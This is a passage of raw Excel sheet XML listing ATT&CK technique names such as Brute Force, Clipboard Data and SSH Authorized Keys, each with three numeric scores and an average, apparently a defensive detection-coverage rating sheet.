    <row r="70" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A70" s="43" t="s">
        <v>153</v>
      </c>
      <c r="B70" s="41" t="str">
        <f>LOOKUP(A70,'REF-DataSources'!A:B)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="C70" s="45" t="s">
        <v>1159</v>
      </c>
      <c r="D70" s="14">
        <v>3</v>
      </c>
      <c r="E70" s="14">
        <v>4</v>
      </c>
      <c r="F70" s="14">
        <v>5</v>
      </c>
      <c r="G70" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="71" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A71" s="43" t="s">
        <v>154</v>
      </c>
      <c r="B71" s="41" t="str">
        <f>LOOKUP(A71,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal on Host</v>
      </c>
      <c r="C71" s="45" t="s">
        <v>1050</v>
      </c>
      <c r="D71" s="14">
        <v>2</v>
      </c>
      <c r="E71" s="14">
        <v>4</v>
      </c>
      <c r="F71" s="14">
        <v>5</v>
      </c>
      <c r="G71" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="72" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A72" s="43" t="s">
        <v>155</v>
      </c>
      <c r="B72" s="41" t="str">
        <f>LOOKUP(A72,'REF-DataSources'!A:B)</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="C72" s="45" t="s">
        <v>697</v>
      </c>
      <c r="D72" s="14">
        <v>1</v>
      </c>
      <c r="E72" s="14">
        <v>3</v>
      </c>
      <c r="F72" s="14">
        <v>4</v>
      </c>
      <c r="G72" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="73" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A73" s="43" t="s">
        <v>157</v>
      </c>
      <c r="B73" s="41" t="str">
        <f>LOOKUP(A73,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C73" s="45" t="s">
        <v>3045</v>
      </c>
      <c r="D73" s="14">
        <v>2</v>
      </c>
      <c r="E73" s="14">
        <v>3</v>
      </c>
      <c r="F73" s="14">
        <v>4</v>
      </c>
      <c r="G73" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="74" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A74" s="43" t="s">
        <v>159</v>
      </c>
      <c r="B74" s="41" t="str">
        <f>LOOKUP(A74,'REF-DataSources'!A:B)</f>
        <v>Software Deployment Tools</v>
      </c>
      <c r="C74" s="45" t="s">
        <v>3046</v>
      </c>
      <c r="D74" s="14">
        <v>2</v>
      </c>
      <c r="E74" s="14">
        <v>4</v>
      </c>
      <c r="F74" s="14">
        <v>5</v>
      </c>
      <c r="G74" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="75" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A75" s="43" t="s">
        <v>160</v>
      </c>
      <c r="B75" s="41" t="str">
        <f>LOOKUP(A75,'REF-DataSources'!A:B)</f>
        <v>Data Staged</v>
      </c>
      <c r="C75" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D75" s="14">
        <v>1</v>
      </c>
      <c r="E75" s="14">
        <v>3</v>
      </c>
      <c r="F75" s="14">
        <v>4</v>
      </c>
      <c r="G75" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="76" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A76" s="43" t="s">
        <v>161</v>
      </c>
      <c r="B76" s="41" t="str">
        <f>LOOKUP(A76,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C76" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D76" s="14">
        <v>4</v>
      </c>
      <c r="E76" s="14">
        <v>4</v>
      </c>
      <c r="F76" s="14">
        <v>4</v>
      </c>
      <c r="G76" s="32">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
    </row>
    <row r="77" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A77" s="43" t="s">
        <v>162</v>
      </c>
      <c r="B77" s="41" t="str">
        <f>LOOKUP(A77,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C77" s="45" t="s">
        <v>3047</v>
      </c>
      <c r="D77" s="14">
        <v>3</v>
      </c>
      <c r="E77" s="14">
        <v>5</v>
      </c>
      <c r="F77" s="14">
        <v>5</v>
      </c>
      <c r="G77" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="78" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A78" s="43" t="s">
        <v>163</v>
      </c>
      <c r="B78" s="41" t="str">
        <f>LOOKUP(A78,'REF-DataSources'!A:B)</f>
        <v>Remote Data Staging</v>
      </c>
      <c r="C78" s="45" t="s">
        <v>3048</v>
      </c>
      <c r="D78" s="14">
        <v>3</v>
      </c>
      <c r="E78" s="14">
        <v>5</v>
      </c>
      <c r="F78" s="14">
        <v>5</v>
      </c>
      <c r="G78" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="79" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A79" s="43" t="s">
        <v>165</v>
      </c>
      <c r="B79" s="41" t="str">
        <f>LOOKUP(A79,'REF-DataSources'!A:B)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="C79" s="45" t="s">
        <v>1121</v>
      </c>
      <c r="D79" s="14">
        <v>2</v>
      </c>
      <c r="E79" s="14">
        <v>4</v>
      </c>
      <c r="F79" s="14">
        <v>5</v>
      </c>
      <c r="G79" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="80" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A80" s="43" t="s">
        <v>167</v>
      </c>
      <c r="B80" s="41" t="str">
        <f>LOOKUP(A80,'REF-DataSources'!A:B)</f>
        <v>Cloud Accounts</v>
      </c>
      <c r="C80" s="45" t="s">
        <v>3049</v>
      </c>
      <c r="D80" s="14">
        <v>0</v>
      </c>
      <c r="E80" s="14">
        <v>2</v>
      </c>
      <c r="F80" s="14">
        <v>3</v>
      </c>
      <c r="G80" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="81" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A81" s="43" t="s">
        <v>169</v>
      </c>
      <c r="B81" s="41" t="str">
        <f>LOOKUP(A81,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C81" s="45" t="s">
        <v>743</v>
      </c>
      <c r="D81" s="14">
        <v>0</v>
      </c>
      <c r="E81" s="14">
        <v>3</v>
      </c>
      <c r="F81" s="14">
        <v>5</v>
      </c>
      <c r="G81" s="32">
        <f t="shared" si="1"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="82" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A82" s="43" t="s">
        <v>170</v>
      </c>
      <c r="B82" s="41" t="str">
        <f>LOOKUP(A82,'REF-DataSources'!A:B)</f>
        <v>Taint Shared Content</v>
      </c>
      <c r="C82" s="45" t="s">
        <v>2085</v>
      </c>
      <c r="D82" s="14">
        <v>2</v>
      </c>
      <c r="E82" s="14">
        <v>3</v>
      </c>
      <c r="F82" s="14">
        <v>5</v>
      </c>
      <c r="G82" s="32">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
    </row>
    <row r="83" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A83" s="43" t="s">
        <v>171</v>
      </c>
      <c r="B83" s="41" t="str">
        <f>LOOKUP(A83,'REF-DataSources'!A:B)</f>
        <v>System Information Discovery</v>
      </c>
      <c r="C83" s="45" t="s">
        <v>1152</v>
      </c>
      <c r="D83" s="14">
        <v>3</v>
      </c>
      <c r="E83" s="14">
        <v>4</v>
      </c>
      <c r="F83" s="14">
        <v>4</v>
      </c>
      <c r="G83" s="32">
        <f t="shared" si="1"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="84" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A84" s="43" t="s">
        <v>172</v>
      </c>
      <c r="B84" s="41" t="str">
        <f>LOOKUP(A84,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C84" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D84" s="14">
        <v>1</v>
      </c>
      <c r="E84" s="14">
        <v>3</v>
      </c>
      <c r="F84" s="14">
        <v>4</v>
      </c>
      <c r="G84" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="85" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A85" s="43" t="s">
        <v>173</v>
      </c>
      <c r="B85" s="41" t="str">
        <f>LOOKUP(A85,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C85" s="45" t="s">
        <v>3024</v>
      </c>
      <c r="D85" s="14">
        <v>3</v>
      </c>
      <c r="E85" s="14">
        <v>4</v>
      </c>
      <c r="F85" s="14">
        <v>5</v>
      </c>
      <c r="G85" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="86" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A86" s="43" t="s">
        <v>174</v>
      </c>
      <c r="B86" s="41" t="str">
        <f>LOOKUP(A86,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C86" s="45" t="s">
        <v>763</v>
      </c>
      <c r="D86" s="14">
        <v>3</v>
      </c>
      <c r="E86" s="14">
        <v>4</v>
      </c>
      <c r="F86" s="14">
        <v>5</v>
      </c>
      <c r="G86" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="87" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A87" s="43" t="s">
        <v>176</v>
      </c>
      <c r="B87" s="41" t="str">
        <f>LOOKUP(A87,'REF-DataSources'!A:B)</f>
        <v>File and Directory Discovery</v>
      </c>
      <c r="C87" s="45" t="s">
        <v>3050</v>
      </c>
      <c r="D87" s="14">
        <v>2</v>
      </c>
      <c r="E87" s="14">
        <v>4</v>
      </c>
      <c r="F87" s="14">
        <v>5</v>
      </c>
      <c r="G87" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="88" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A88" s="43" t="s">
        <v>178</v>
      </c>
      <c r="B88" s="41" t="str">
        <f>LOOKUP(A88,'REF-DataSources'!A:B)</f>
        <v>Account Discovery</v>
      </c>
      <c r="C88" s="45" t="s">
        <v>1159</v>
      </c>
      <c r="D88" s="14">
        <v>3</v>
      </c>
      <c r="E88" s="14">
        <v>4</v>
      </c>
      <c r="F88" s="14">
        <v>5</v>
      </c>
      <c r="G88" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="89" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A89" s="43" t="s">
        <v>179</v>
      </c>
      <c r="B89" s="41" t="str">
        <f>LOOKUP(A89,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C89" s="45" t="s">
        <v>3051</v>
      </c>
      <c r="D89" s="14">
        <v>2</v>
      </c>
      <c r="E89" s="14">
        <v>4</v>
      </c>
      <c r="F89" s="14">
        <v>5</v>
      </c>
      <c r="G89" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="90" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A90" s="43" t="s">
        <v>181</v>
      </c>
      <c r="B90" s="41" t="str">
        <f>LOOKUP(A90,'REF-DataSources'!A:B)</f>
        <v>Cloud Account</v>
      </c>
      <c r="C90" s="45" t="s">
        <v>3052</v>
      </c>
      <c r="D90" s="14">
        <v>3</v>
      </c>
      <c r="E90" s="14">
        <v>4</v>
      </c>
      <c r="F90" s="14">
        <v>5</v>
      </c>
      <c r="G90" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="91" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A91" s="43" t="s">
        <v>183</v>
      </c>
      <c r="B91" s="41" t="str">
        <f>LOOKUP(A91,'REF-DataSources'!A:B)</f>
        <v>Proxy</v>
      </c>
      <c r="C91" s="45" t="s">
        <v>3053</v>
      </c>
      <c r="D91" s="14">
        <v>2</v>
      </c>
      <c r="E91" s="14">
        <v>3</v>
      </c>
      <c r="F91" s="14">
        <v>4</v>
      </c>
      <c r="G91" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="92" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A92" s="43" t="s">
        <v>185</v>
      </c>
      <c r="B92" s="41" t="str">
        <f>LOOKUP(A92,'REF-DataSources'!A:B)</f>
        <v>Replication Through Removable Media</v>
      </c>
      <c r="C92" s="45" t="s">
        <v>1203</v>
      </c>
      <c r="D92" s="14">
        <v>1</v>
      </c>
      <c r="E92" s="14">
        <v>3</v>
      </c>
      <c r="F92" s="14">
        <v>3</v>
      </c>
      <c r="G92" s="32">
        <f t="shared" si="1"/>
        <v>2.2000000000000002</v>
      </c>
    </row>
    <row r="93" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A93" s="43" t="s">
        <v>186</v>
      </c>
      <c r="B93" s="41" t="str">
        <f>LOOKUP(A93,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C93" s="45" t="s">
        <v>1203</v>
      </c>
      <c r="D93" s="14">
        <v>0</v>
      </c>
      <c r="E93" s="14">
        <v>2</v>
      </c>
      <c r="F93" s="14">
        <v>2</v>
      </c>
      <c r="G93" s="32">
        <f t="shared" si="1"/>
        <v>1.2</v>
      </c>
    </row>
    <row r="94" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A94" s="43" t="s">
        <v>187</v>
      </c>
      <c r="B94" s="41" t="str">
        <f>LOOKUP(A94,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C94" s="45" t="s">
        <v>902</v>
      </c>
      <c r="D94" s="14">
        <v>1</v>
      </c>
      <c r="E94" s="14">
        <v>3</v>
      </c>
      <c r="F94" s="14">
        <v>4</v>
      </c>
      <c r="G94" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="95" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A95" s="43" t="s">
        <v>188</v>
      </c>
      <c r="B95" s="41" t="str">
        <f>LOOKUP(A95,'REF-DataSources'!A:B)</f>
        <v>Communication Through Removable Media</v>
      </c>
      <c r="C95" s="45" t="s">
        <v>3054</v>
      </c>
      <c r="D95" s="14">
        <v>0</v>
      </c>
      <c r="E95" s="14">
        <v>2</v>
      </c>
      <c r="F95" s="14">
        <v>3</v>
      </c>
      <c r="G95" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="96" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A96" s="43" t="s">
        <v>190</v>
      </c>
      <c r="B96" s="41" t="str">
        <f>LOOKUP(A96,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C96" s="45" t="s">
        <v>1211</v>
      </c>
      <c r="D96" s="14">
        <v>0</v>
      </c>
      <c r="E96" s="14">
        <v>2</v>
      </c>
      <c r="F96" s="14">
        <v>3</v>
      </c>
      <c r="G96" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="97" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A97" s="43" t="s">
        <v>192</v>
      </c>
      <c r="B97" s="41" t="str">
        <f>LOOKUP(A97,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C97" s="45" t="s">
        <v>3055</v>
      </c>
      <c r="D97" s="14">
        <v>1</v>
      </c>
      <c r="E97" s="14">
        <v>3</v>
      </c>
      <c r="F97" s="14">
        <v>4</v>
      </c>
      <c r="G97" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="98" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A98" s="43" t="s">
        <v>194</v>
      </c>
      <c r="B98" s="41" t="str">
        <f>LOOKUP(A98,'REF-DataSources'!A:B)</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="C98" s="45" t="s">
        <v>1139</v>
      </c>
      <c r="D98" s="14">
        <v>3</v>
      </c>
      <c r="E98" s="14">
        <v>4</v>
      </c>
      <c r="F98" s="14">
        <v>5</v>
      </c>
      <c r="G98" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="99" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A99" s="43" t="s">
        <v>195</v>
      </c>
      <c r="B99" s="41" t="str">
        <f>LOOKUP(A99,'REF-DataSources'!A:B)</f>
        <v>Account Manipulation</v>
      </c>
      <c r="C99" s="45" t="s">
        <v>3056</v>
      </c>
      <c r="D99" s="14">
        <v>3</v>
      </c>
      <c r="E99" s="14">
        <v>4</v>
      </c>
      <c r="F99" s="14">
        <v>5</v>
      </c>
      <c r="G99" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="100" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A100" s="43" t="s">
        <v>196</v>
      </c>
      <c r="B100" s="41" t="str">
        <f>LOOKUP(A100,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C100" s="45" t="s">
        <v>598</v>
      </c>
      <c r="D100" s="14">
        <v>2</v>
      </c>
      <c r="E100" s="14">
        <v>4</v>
      </c>
      <c r="F100" s="14">
        <v>5</v>
      </c>
      <c r="G100" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="101" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A101" s="43" t="s">
        <v>198</v>
      </c>
      <c r="B101" s="41" t="str">
        <f>LOOKUP(A101,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C101" s="45" t="s">
        <v>3057</v>
      </c>
      <c r="D101" s="14">
        <v>2</v>
      </c>
      <c r="E101" s="14">
        <v>4</v>
      </c>
      <c r="F101" s="14">
        <v>5</v>
      </c>
      <c r="G101" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="102" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A102" s="43" t="s">
        <v>199</v>
      </c>
      <c r="B102" s="41" t="str">
        <f>LOOKUP(A102,'REF-DataSources'!A:B)</f>
        <v>SSH Authorized Keys</v>
      </c>
      <c r="C102" s="45" t="s">
        <v>2019</v>
      </c>
      <c r="D102" s="14">
        <v>2</v>
      </c>
      <c r="E102" s="14">
        <v>3</v>
      </c>
      <c r="F102" s="14">
        <v>4</v>
      </c>
      <c r="G102" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="103" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A103" s="43" t="s">
        <v>200</v>
      </c>
      <c r="B103" s="41" t="str">
        <f>LOOKUP(A103,'REF-DataSources'!A:B)</f>
        <v>Web Service</v>
      </c>
      <c r="C103" s="45" t="s">
        <v>1241</v>
      </c>
      <c r="D103" s="14">
        <v>3</v>
      </c>
      <c r="E103" s="14">
        <v>4</v>
      </c>
      <c r="F103" s="14">
        <v>5</v>
      </c>
      <c r="G103" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="104" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A104" s="43" t="s">
        <v>202</v>
      </c>
      <c r="B104" s="41" t="str">
        <f>LOOKUP(A104,'REF-DataSources'!A:B)</f>
        <v>One-Way Communication</v>
      </c>
      <c r="C104" s="45" t="s">
        <v>3058</v>
      </c>
      <c r="D104" s="14">
        <v>3</v>
      </c>
      <c r="E104" s="14">
        <v>4</v>
      </c>
      <c r="F104" s="14">
        <v>5</v>
      </c>
      <c r="G104" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="105" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A105" s="43" t="s">
        <v>203</v>
      </c>
      <c r="B105" s="41" t="str">
        <f>LOOKUP(A105,'REF-DataSources'!A:B)</f>
        <v>Multi-Stage Channels</v>
      </c>
      <c r="C105" s="45" t="s">
        <v>1256</v>
      </c>
      <c r="D105" s="14">
        <v>0</v>
      </c>
      <c r="E105" s="14">
        <v>2</v>
      </c>
      <c r="F105" s="14">
        <v>3</v>
      </c>
      <c r="G105" s="32">
        <f t="shared" si="1"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="106" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A106" s="43" t="s">
        <v>205</v>
      </c>
      <c r="B106" s="41" t="str">
        <f>LOOKUP(A106,'REF-DataSources'!A:B)</f>
        <v>Ingress Tool Transfer</v>
      </c>
      <c r="C106" s="45" t="s">
        <v>3059</v>
      </c>
      <c r="D106" s="14">
        <v>1</v>
      </c>
      <c r="E106" s="14">
        <v>3</v>
      </c>
      <c r="F106" s="14">
        <v>4</v>
      </c>
      <c r="G106" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="107" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A107" s="43" t="s">
        <v>207</v>
      </c>
      <c r="B107" s="41" t="str">
        <f>LOOKUP(A107,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C107" s="45" t="s">
        <v>3060</v>
      </c>
      <c r="D107" s="14">
        <v>1</v>
      </c>
      <c r="E107" s="14">
        <v>2</v>
      </c>
      <c r="F107" s="14">
        <v>3</v>
      </c>
      <c r="G107" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="108" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A108" s="43" t="s">
        <v>208</v>
      </c>
      <c r="B108" s="41" t="str">
        <f>LOOKUP(A108,'REF-DataSources'!A:B)</f>
        <v>Native API</v>
      </c>
      <c r="C108" s="45" t="s">
        <v>3061</v>
      </c>
      <c r="D108" s="14">
        <v>1</v>
      </c>
      <c r="E108" s="14">
        <v>3</v>
      </c>
      <c r="F108" s="14">
        <v>5</v>
      </c>
      <c r="G108" s="32">
        <f t="shared" si="1"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="109" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A109" s="43" t="s">
        <v>210</v>
      </c>
      <c r="B109" s="41" t="str">
        <f>LOOKUP(A109,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C109" s="45" t="s">
        <v>1268</v>
      </c>
      <c r="D109" s="14">
        <v>2</v>
      </c>
      <c r="E109" s="14">
        <v>3</v>
      </c>
      <c r="F109" s="14">
        <v>4</v>
      </c>
      <c r="G109" s="32">
        <f t="shared" si="1"/>
        <v>2.8</v>
      </c>
    </row>
    <row r="110" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A110" s="43" t="s">
        <v>212</v>
      </c>
      <c r="B110" s="41" t="str">
        <f>LOOKUP(A110,'REF-DataSources'!A:B)</f>
        <v>Redundant Access</v>
      </c>
      <c r="C110" s="45" t="s">
        <v>3062</v>
      </c>
      <c r="D110" s="14">
        <v>0</v>
      </c>
      <c r="E110" s="14">
        <v>1</v>
      </c>
      <c r="F110" s="14">
        <v>3</v>
      </c>
      <c r="G110" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="111" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A111" s="43" t="s">
        <v>214</v>
      </c>
      <c r="B111" s="41" t="str">
        <f>LOOKUP(A111,'REF-DataSources'!A:B)</f>
        <v>Brute Force</v>
      </c>
      <c r="C111" s="45" t="s">
        <v>1275</v>
      </c>
      <c r="D111" s="14">
        <v>4</v>
      </c>
      <c r="E111" s="14">
        <v>4</v>
      </c>
      <c r="F111" s="14">
        <v>5</v>
      </c>
      <c r="G111" s="32">
        <f t="shared" si="1"/>
        <v>4.2</v>
      </c>
    </row>
    <row r="112" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A112" s="43" t="s">
        <v>215</v>
      </c>
      <c r="B112" s="41" t="str">
        <f>LOOKUP(A112,'REF-DataSources'!A:B)</f>
        <v>Two-Factor Authentication Interception</v>
      </c>
      <c r="C112" s="45" t="s">
        <v>1298</v>
      </c>
      <c r="D112" s="14">
        <v>1</v>
      </c>
      <c r="E112" s="14">
        <v>2</v>
      </c>
      <c r="F112" s="14">
        <v>3</v>
      </c>
      <c r="G112" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="113" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A113" s="43" t="s">
        <v>216</v>
      </c>
      <c r="B113" s="41" t="str">
        <f>LOOKUP(A113,'REF-DataSources'!A:B)</f>
        <v>Modify Registry</v>
      </c>
      <c r="C113" s="45" t="s">
        <v>1302</v>
      </c>
      <c r="D113" s="14">
        <v>2</v>
      </c>
      <c r="E113" s="14">
        <v>4</v>
      </c>
      <c r="F113" s="14">
        <v>5</v>
      </c>
      <c r="G113" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="114" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A114" s="43" t="s">
        <v>218</v>
      </c>
      <c r="B114" s="41" t="str">
        <f>LOOKUP(A114,'REF-DataSources'!A:B)</f>
        <v>Screen Capture</v>
      </c>
      <c r="C114" s="45" t="s">
        <v>1306</v>
      </c>
      <c r="D114" s="14">
        <v>1</v>
      </c>
      <c r="E114" s="14">
        <v>2</v>
      </c>
      <c r="F114" s="14">
        <v>3</v>
      </c>
      <c r="G114" s="32">
        <f t="shared" si="1"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="115" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A115" s="43" t="s">
        <v>220</v>
      </c>
      <c r="B115" s="41" t="str">
        <f>LOOKUP(A115,'REF-DataSources'!A:B)</f>
        <v>Email Collection</v>
      </c>
      <c r="C115" s="45" t="s">
        <v>1310</v>
      </c>
      <c r="D115" s="14">
        <v>2</v>
      </c>
      <c r="E115" s="14">
        <v>4</v>
      </c>
      <c r="F115" s="14">
        <v>5</v>
      </c>
      <c r="G115" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="116" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A116" s="43" t="s">
        <v>222</v>
      </c>
      <c r="B116" s="41" t="str">
        <f>LOOKUP(A116,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C116" s="45" t="s">
        <v>603</v>
      </c>
      <c r="D116" s="14">
        <v>1</v>
      </c>
      <c r="E116" s="14">
        <v>1</v>
      </c>
      <c r="F116" s="14">
        <v>1</v>
      </c>
      <c r="G116" s="32">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
    </row>
    <row r="117" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A117" s="43" t="s">
        <v>223</v>
      </c>
      <c r="B117" s="41" t="str">
        <f>LOOKUP(A117,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C117" s="45" t="s">
        <v>713</v>
      </c>
      <c r="D117" s="14">
        <v>1</v>
      </c>
      <c r="E117" s="14">
        <v>3</v>
      </c>
      <c r="F117" s="14">
        <v>5</v>
      </c>
      <c r="G117" s="32">
        <f t="shared" si="1"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="118" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A118" s="43" t="s">
        <v>224</v>
      </c>
      <c r="B118" s="41" t="str">
        <f>LOOKUP(A118,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C118" s="45" t="s">
        <v>3063</v>
      </c>
      <c r="D118" s="14">
        <v>3</v>
      </c>
      <c r="E118" s="14">
        <v>4</v>
      </c>
      <c r="F118" s="14">
        <v>5</v>
      </c>
      <c r="G118" s="32">
        <f t="shared" si="1"/>
        <v>3.8</v>
      </c>
    </row>
    <row r="119" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A119" s="43" t="s">
        <v>225</v>
      </c>
      <c r="B119" s="41" t="str">
        <f>LOOKUP(A119,'REF-DataSources'!A:B)</f>
        <v>Clipboard Data</v>
      </c>
      <c r="C119" s="45" t="s">
        <v>609</v>
      </c>
      <c r="D119" s="14">
        <v>2</v>
      </c>
      <c r="E119" s="14">
        <v>4</v>
      </c>
      <c r="F119" s="14">
        <v>5</v>
      </c>
      <c r="G119" s="32">
        <f t="shared" si="1"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="120" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A120" s="43" t="s">
        <v>226</v>
      </c>
      <c r="B120" s="41" t="str">
        <f>LOOKUP(A120,'REF-DataSources'!A:B)</f>
        <v>Automated Collection</v>
      </c>
      <c r="C120" s="45" t="s">
        <v>1333</v>
      </c>
      <c r="D120" s="14">
        <v>1</v>
      </c>
      <c r="E120" s="14">
        <v>3</v>
      </c>
      <c r="F120" s="14">
        <v>4</v>
      </c>
      <c r="G120" s="32">
        <f t="shared" si="1"/>
        <v>2.4</v>
      </c>
    </row>
    <row r="121" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A121" s="43" t="s">
        <v>227</v>
      </c>
